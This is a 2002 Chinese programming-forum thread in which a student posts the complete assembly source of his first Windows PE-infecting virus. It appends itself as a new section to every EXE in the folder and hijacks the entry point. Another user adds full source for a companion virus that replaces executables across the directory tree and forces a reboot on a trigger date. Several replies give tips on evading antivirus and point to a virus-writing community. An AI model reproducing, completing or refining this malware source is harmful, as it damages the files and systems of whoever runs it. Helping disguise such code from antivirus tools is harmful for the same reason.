第一個程序就是一個病毒
這是我第一次用assembler language寫程序,呵呵!第一個程序就是一個病毒。很簡單,所以很多地方都問題不少。請大家看看,有什麽意見儘管提,如果我能從中學到東東,一定給分。另外,病毒也是程序,我寫病毒只是爲了學習彙編語言,提高自己的水平,並非進行破壞。
因爲對ASM以前還沒用過,所以請各位高手指點。願意和每一個學習彙編的中國人一起攜手共進,為祖國軟件業爭口氣!我的qq:77853179。願意交個朋友一起學彙編的就加我吧。
以下是源代碼,不知道我現在在xp下如何像98一樣進入Ring0。誰知道告訴我!
倒!他說帖子太長了,沒法發:(
誰要就留下E-MAIL,我發給他源代碼,不過要記得給我提建議哦! :)
问题点数:50、回复次数:21Top
1 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 08:57:19 得分 0
; ******************************************************************************
; * My Program Information *
; ******************************************************************************
; * *
; * Designer : ShaoXiaosheng Place : Minhang Shanghai China *
; * Program Name : SleepingChild *
; * Version Now : 0.1 *
; * Create Date : 2002-2-17 Modify Date : 2002-2-18 *
; * *
; * Microsoft (R) Macro Assembler: Version 6.15.9030 *
; * Microsoft (R) Incremental Linker: Version 7.00.9030 *
; * *
; * EditPlus Text Editor: Version 2.10c *
; * *
; *============================================================================*
; * History *
; *============================================================================*
; * Version 0.1 *
; *============================================================================*
; * No history before. I feel very happy! This is my first virus. Also the *
; * first program use assembler. :) *
; * It is very easy! Only to infect all EXE file with it in the same *
; * directory. Not reside in memory! So it isn't very dangerous. The EXE file *
; * which was infect would show a message box. It doesn't rewrite the infected*
; * file. *
; ******************************************************************************
.386P
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
.data ;initialized data here
MsgBoxCaption2 db "SleepingChild",0
MsgBoxText2 db "Finished! (:",0
DllName1 db "KERNEL32.dll",0
DllName2 db "USER32.dll",0
FunctionName1 db "CreateFileA",0
FunctionName2 db "SetFilePointer",0
FunctionName3 db "ReadFile",0
FunctionName4 db "WriteFile",0
FunctionName5 db "CloseHandle",0
FunctionName6 db "FindFirstFileA",0
FunctionName7 db "FindNextFileA",0
FunctionName8 db "FindClose",0
FunctionName9 db "SetFileAttributesA",0
FunctionName10 db "MessageBoxA",0
.data? ;uninitialized data here
hLib HANDLE ?
.const ;constants here
.code ;here begins my code
; Show message
invoke MessageBox, NULL, addr MsgBoxText2, addr MsgBoxCaption2, MB_OK
invoke FreeLibrary, hLib
; Quit program
invoke ExitProcess, NULL
crazy segment
start:
mov OldoffsetOfEntryPiont, 00001000h
mov OldImageBase, 00400000h
;****************************
;| To get function address. |
;****************************
invoke LoadLibrary, addr DllName1
mov hLib, eax
invoke GetProcAddress, hLib, addr FunctionName1
mov myCreateFile, eax
invoke GetProcAddress, hLib, addr FunctionName2
mov mySetFilePointer, eax
invoke GetProcAddress, hLib, addr FunctionName3
mov myReadFile, eax
invoke GetProcAddress, hLib, addr FunctionName4
mov myWriteFile, eax
invoke GetProcAddress, hLib, addr FunctionName5
mov myCloseHandle, eax
invoke GetProcAddress, hLib, addr FunctionName6
mov myFindFirstFile, eax
invoke GetProcAddress, hLib, addr FunctionName7
mov myFindNextFile, eax
invoke GetProcAddress, hLib, addr FunctionName8
mov myFindClose, eax
invoke GetProcAddress, hLib, addr FunctionName9
mov mySetFileAttributes, eax
invoke LoadLibrary, addr DllName2
mov hLib, eax
invoke GetProcAddress, hLib, addr FunctionName10
mov myMessageBox, eax
v_start:
call game_start
game_start:
pop ebp ; get the present offsetess of "game_start".
sub ebp, offset game_start ; get the remainder between the offsetess
; of "game_start" and offset of it.
mov eax, OldImageBase[ebp]
mov PresentImageBase[ebp], eax
mov eax, OldoffsetOfEntryPiont[ebp]
mov PresentoffsetOfEntryPiont[ebp], eax
; Begin to find the first file.
lea eax, lpFindFileData[ebp]
push eax
lea eax, lpFileName[ebp]
push eax
call myFindFirstFile[ebp]
.if eax==INVALID_HANDLE_VALUE
jmp FindFileEnd
.endif
mov hFind[ebp], eax
Operate:
; To set the attributes of the finded file.
push FILE_ATTRIBUTE_NORMAL
lea eax, lpFindFileData[ebp].cFileName
push eax
call mySetFileAttributes[ebp]
; To open the finded file for operating
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_ALWAYS
push NULL
push FILE_SHARE_WRITE
push GENERIC_WRITE or GENERIC_READ
lea eax, lpFindFileData[ebp].cFileName
push eax
call myCreateFile[ebp]
.if eax==INVALID_HANDLE_VALUE
jmp error
.endif
mov hFile[ebp], eax
; If the word value at offset 18h is 40h or greater, the word value at 3ch is typically
; an offset to a Windows header.
push FILE_BEGIN
push NULL
push 18h
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 1
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]Top
2 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 08:57:59 得分 0
.if lpBuffer[ebp]<40h
jmp exit
.endif
; Infected or not?
push FILE_BEGIN
push NULL
push 38h
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax,BytesRead[ebp]
push eax
push 3
lea eax,lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
.if lpBuffer[ebp]=='Sxs'
jmp infected
.endif
; To move the file pointer to the offsetess where the value of offsetess of PE header is
push FILE_BEGIN
push NULL
push 3ch
push hFile[ebp]
call mySetFilePointer[ebp]
; To read the opened file to get the offsetess of PE header
push NULL
lea eax,BytesRead[ebp]
push eax
push 4
lea eax,PE_sig_offset[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To move the pointer to PE header
push FILE_BEGIN
push NULL
push PE_sig_offset[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
; To read the PE header. If this isn't a real PE, exit.
push NULL
lea eax,BytesRead[ebp]
push eax
push 4
lea eax,PE_signature[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
.if PE_signature[ebp]!=4550h
jmp exit
.endif
;******************************************
;| At first, I'll get some useful values. |
;******************************************
; To get the number of sections
push FILE_CURRENT
push NULL
push 2
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax,BytesRead[ebp]
push eax
push 2
lea eax,NumberOfSections[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To get the size of optinal header
push FILE_CURRENT
push NULL
push 12
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 2
lea eax,SizeOfOptionalHeader[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To judge the Magic mumber. If the image isn't PE32, then exit.
push FILE_CURRENT
push NULL
push 2
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 2
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
.if lpBuffer[ebp]!=010bh
jmp exit
.endif
; To get the offset of the entry point
push FILE_CURRENT
push NULL
push 14
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, offsetOfEntryPiont[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
mov eax, offsetOfEntryPiont[ebp]
mov OldoffsetOfEntryPiont[ebp], eax
; To get the image base
push FILE_CURRENT
push NULL
push 8
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, ImageBase[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
mov eax, ImageBase[ebp]
mov OldImageBase[ebp], eax
; To get the section alignment
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, SectionAlignment[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To get the file alignment
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, FileAlignment[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To get the size of image
push FILE_CURRENT
push NULL
push 16
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, SizeOfImage[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
mov eax, SizeOfImage[ebp]
mov offsetOfEntryPiont[ebp], eax ;new offsetOfEntryPiont==old SizeOfImage
; To get the size of headers
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, SizeOfHeaders[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]Top
3 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 08:58:32 得分 0
;****************************************************************************************
;| Caculate the room for the new section header. If there is not enoughroom, then |
;| exit. The size of section header is 28h. The amount size ofPE signature and COFF |
;| file header is 18h. |
;| room=SizeOfHeaders-[(NumberOfSections+1)*28h+SizeOfOptionalHeader+18h+PE_sig_offset] |
;****************************************************************************************
mov ecx, 28h
mov eax, NumberOfSections[ebp]
mul ecx
add eax, 18h
add eax, PE_sig_offset[ebp]
add eax, SizeOfOptionalHeader[ebp]
push eax
add eax, 28h
.if eax > SizeOfHeaders[ebp]
jmp exit
.endif
;***********************************************
;| Now begin to create the new section header. |
;***********************************************
;| First modify the number of sections |
;***********************************************
mov eax, NumberOfSections[ebp]
inc eax
mov NumberOfSections[ebp], eax
mov eax, PE_sig_offset[ebp]
add eax, 6
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 2
lea eax, NumberOfSections[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
;****************
;| Second create|
;****************
; Name
pop eax
push eax
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 8
lea eax, SectionName[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; VirtualSize
mov VirtualSize[ebp], offset v_end-offset v_start
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, VirtualSize[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; Virtualoffsetess==new offsetessOfEntryPiont==old SizeOfImage
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, SizeOfImage[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; SizeOfRawData
mov eax, VirtualSize[ebp]
xor edx, edx
mov ecx, FileAlignment[ebp]
div ecx
inc eax
mul FileAlignment[ebp]
mov lpBuffer[ebp], eax
mov SizeOfRawData[ebp], eax
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; PointToRawData
sub NumberOfSections[ebp], 2
mov eax, NumberOfSections[ebp]
mov ecx, 28h
mul ecx
mov edx, 18h
add edx, PE_sig_offset[ebp]
add edx, SizeOfOptionalHeader[ebp]
add eax, edx
add eax, 16
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
push lpBuffer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
pop eax
add eax, lpBuffer[ebp]
mov BytesRead[ebp],eax
pop lpBuffer[ebp]
push BytesRead[ebp]
add lpBuffer[ebp], 20
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, BytesRead[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; Characteristics
push FILE_CURRENT
push NULL
push 12
push hFile[ebp]
call mySetFilePointer[ebp]
mov lpBuffer[ebp], 0E0000020h ; Make the setction readable, writeable, code, executable
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
;************************************************
;| Modify offsetessOfEntryPiont and SizeOfImage |
;************************************************
mov ecx, SectionAlignment[ebp]
mov eax, VirtualSize[ebp]
xor edx, edx
div ecx
inc eax
mul ecx
mov ebx, SizeOfImage[ebp]
add SizeOfImage[ebp], eax
mov eax, 18h
add eax, PE_sig_offset[ebp]
add eax, 16
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax,offsetOfEntryPiont[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
push FILE_CURRENT
push NULL
push 36
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, SizeOfImage[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
;***************************************************
;| Everything seems very easy :) |
;| Now let's write the code into the operated file |
;***************************************************
pop lpBuffer[ebp]
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push SizeOfRawData[ebp]
lea eax, v_start[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]Top
4 楼Ring0(邵曉盛)回复于 2002-02-19 09:00:22 得分 0
;*************************************
;| Ha!Ha! :) Write the infected mark |
;*************************************
push FILE_BEGIN
push NULL
push 38h
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 3
lea eax, InfectedMark[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
infected:
exit:
; To close the file handle
push hFile[ebp]
call myCloseHandle[ebp]
error:
;*******************************************************
;| One file has infected. Now begin to find next file. |
;*******************************************************
lea eax, lpFindFileData[ebp]
push eax
push hFind[ebp]
call myFindNextFile[ebp]
.if eax!=0
jmp Operate
.endif
FindFileEnd:
;**************************
;| OK! Stop finding file. |
;**************************
push hFind[ebp]
call myFindClose[ebp]
;*******************
;| Okay! Finished! |
;*******************
; Symptom
push MB_OK
lea eax, MsgBoxCaption[ebp]
push eax
lea eax, MsgBoxText[ebp]
push eax
push NULL
call myMessageBox[ebp]
;return
mov eax, PresentoffsetOfEntryPiont[ebp]
add eax, PresentImageBase[ebp]
push eax
ret
;********
;| data |
;********
MsgBoxCaption db "SleepingChild",0
MsgBoxText db "PE ATTACKED! (:",0
lpFileName db "*.exe",0
SectionName db "19840209",0
InfectedMark db "Sxs",0
hFind HANDLE 0
hFile HANDLE 0
lpFindFileData WIN32_FIND_DATA <0>
lpBuffer dd 0
BytesRead dd 0
BytesWrote dd 0
PE_sig_offset dd 0
PE_signature dd 0
NumberOfSections dd 0
SizeOfOptionalHeader dd 0
offsetOfEntryPiont dd 0
ImageBase dd 0
SectionAlignment dd 0
FileAlignment dd 0
SizeOfImage dd 0
SizeOfHeaders dd 0
VirtualSize dd 0
SizeOfRawData dd 0
OldoffsetOfEntryPiont dd 0
OldImageBase dd 0
PresentoffsetOfEntryPiont dd 0
PresentImageBase dd 0
myCreateFile dd 0
mySetFilePointer dd 0
myReadFile dd 0
myWriteFile dd 0
myCloseHandle dd 0
myMessageBox dd 0
myFindFirstFile dd 0
myFindNextFile dd 0
myFindClose dd 0
mySetFileAttributes dd 0
v_end:
crazy ends
end startTop
5 楼Ring0(邵曉盛)回复于 2002-02-19 09:01:52 得分 0
好了,以上是源程序,總算貼出來了!:)Top
6 楼zycat2002(展姚)回复于 2002-02-19 13:18:40 得分 0
不错嘛!!可惜编译出来后,在杀毒软件的虚拟机里被查了出来...
报告说该程序试图修改其他程序,对了建议你过滤一下windows2000/xp下的保护文件,别让人在windows2000下看见那个出错对话框...
再加上过滤杀毒软件程序的功能(避免那种报告!!!)
如果可以的话,还应对SEH进行修改,避免感染失败后的出错对话框
......
太多了
我的地址是zycat1986.9.4@163.com
我很想知道在XP下利用ring3方法进入ring0的一些方法Top
7 楼netter_bj(问题男孩)回复于 2002-02-19 14:26:35 得分 0
嘿嘿,,我的EMAIL
netter_3@yeah.netTop
8 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 15:25:57 得分 0
To: zycat2002(展姚)
多謝,我現在正在研究SEHTop
9 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 15:27:46 得分 0
是不是用FileMapping效果會更好?(速度方面)Top
10 楼awinder(风)回复于 2002-02-19 15:31:13 得分 10
写的挺好,标准的win32病毒,可以用作教程了。:)
不过要想实用还要多努力,起码不能让杀毒软件查出来吧。
http://cn.geocities.com/cntsu00/
有2000下ring0的方法,你可以参考以下。
Top
11 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 15:36:14 得分 0
謝謝鼓勵!:)哈哈!我會努力的。不過快考大學了,忙!:(
沒錯,起码不能让杀毒软件查出来,不過我還不精通彙編,剛剛開始,我有信心!:)
以後寫一些為大家服務的程序。Top
12 楼zycat2002(展姚)回复于 2002-02-19 18:52:34 得分 10
to Sleeping_Child
如果你觉得想提高自己的水平,就到Www.virusinc.com去注册一个账号,成为
真正的病毒编写人员。
或者找我的朋友苏睿暄(suruixuan1@sina.com),他可以给我点面子
帮帮你......
Top
13 楼vBin(彬)回复于 2002-02-19 22:40:00 得分 15
个人意见:
可以利用病毒知识编写一些比较好用的软件
毕竟病毒不适合发布(起码不敢明着发)
若变成好用的软件启不妙载?
而且做成的软件,有些方面还要比病毒考虑的全一些呢。
我就利用做病毒的方法做了一个EXE文件合并器,支持Win32系统。
你也可以尝试一下,做一些类似的软件。
我发现这样的软件挺少的,有大多也是国外或者含金量不高。
加油,支持国产软件。
Top
14 楼Sleeping_Child(邵曉盛)回复于 2002-02-21 08:33:42 得分 0
嗯!vBin(彬) 說的有道理,我贊成!
同樣謝謝zycat2002(展姚) 的意見。
:)
問一下zycat2002(展姚) :我的防火墻爲什麽沒法找出這個病毒?
我用的是norton和金山毒霸Top
15 楼Sleeping_Child(邵曉盛)回复于 2002-02-21 08:38:56 得分 0
To:zycat2002(展姚)
那個網站要錢的!:(Top
16 楼atm2001(松鼠)回复于 2002-02-21 15:11:10 得分 0
不要钱的网站,会有精品吗?
Top
17 楼atm2001(松鼠)回复于 2002-02-21 15:16:43 得分 0
zycat2002(展姚)说的杀毒软件是病毒检测机,是给专业反病毒人员用,
一般情况下你是找不到的,在下就是苏睿暄
Top
18 楼Sleeping_Child(邵曉盛)回复于 2002-02-21 15:51:34 得分 0
嗯!我知道,在csdn上我看到過你給人家的回復,知道你是高手。是嗎?深奧,不過虛擬机到聽到過。Top
19 楼atm2001(松鼠)回复于 2002-02-21 16:26:58 得分 15
这是我的第一个病毒(不是我的第一个程序,我的第一个程序是杀病毒的)
.386
.model flat
locals
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC
.DATA
TituloVentana db 'WIN32.First by 苏睿暄',0
TextoVentana db 'made in china',0
MemHandle dd 0
Victimas db '*.EXE',0
SearcHandle dd 0
Longitud dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ParaCorrer db 200 dup (0)
Original db 200 dup (0)
Actual db 200 dup (0)
PuntoPunto db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0
.CODE
BORGES: mov eax,offset SystemTimeStruc
push eax
call GetSystemTime
mov ax,word ptr offset [SystemTimeStruc+2]
cmp al,9
jne NoFQVbirthday
mov ax,word ptr offset [SystemTimeStruc+6]
cmp al,17
je Adios
NoFQVbirthday:
push offset Original
push 000000C8h
call GetCurrentDirectoryA
mov dword ptr [Longitud],eax
call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA
mov edi,eax
Buscar: cmp byte ptr [edi],'.'
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi
add edi,4
mov byte ptr [edi],00
Carrousell:
call InfectDirectory
push offset PuntoPunto
call SetCurrentDirectoryA
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell
InfectDirectory:
push offset Win32FindData
push offset Victimas
call FindFirstFileA
mov dword ptr [SearcHandle],eax
Ciclo: cmp eax,-1
je Salida
or eax,eax
jnz Continuar
ret
Continuar:
push offset Hallado
push offset Crear
call lstrcpyA
mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h
push offset Crear
push offset Hallado
call MoveFileA
push 0
push offset Hallado
push offset ParaCorrer+1
call CopyFileA
push offset Win32FindData
push dword ptr [SearcHandle]
call FindNextFileA
jmp Ciclo
FillClipboard:
push 0
call OpenClipboard
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax
mov dword ptr [MemHandle],eax
call GlobalLock
push eax
push offset TituloVentana
push eax
call lstrcpyA
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData
call CloseClipboard
jmp Run4theNight
Adios: push 00000001
push offset TituloVentana
push offset TextoVentana
push 0
call MessageBoxA
push 0
push 00000002 ; EWX_REBOOT
call ExitWindowsEx
Salida: push offset Original
call SetCurrentDirectoryA
mov ax,word ptr offset [SystemTimeStruc+4]
cmp al,2
je FillClipboard
Run4theNight:
push offset ProcessInfo
push offset StartupInfo
sub eax,eax
push eax
push eax
push 00000010h
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov dword ptr [esi],0004d4f43h
push offset ParaCorrer+1
call CreateProcessA
push 0
call ExitProcess
Ends
End BORGESTop
20 楼Sleeping_Child(邵曉盛)回复于 2002-02-22 14:24:35 得分 0
哇!你搞過反病毒的嗎?我沒學過dos下的彙編。好,我學習以下你的代碼,謝謝!Top
21 楼ckhitler(ckhitler)回复于 2002-02-22 14:46:29 得分 0
这么年轻就有如此的功力,真让人羡慕,不过好像能用反病毒软件查出来,好好完善一下,祝你高考成功,考一所好大学,这的兄弟支持你。一起努力吧。Top
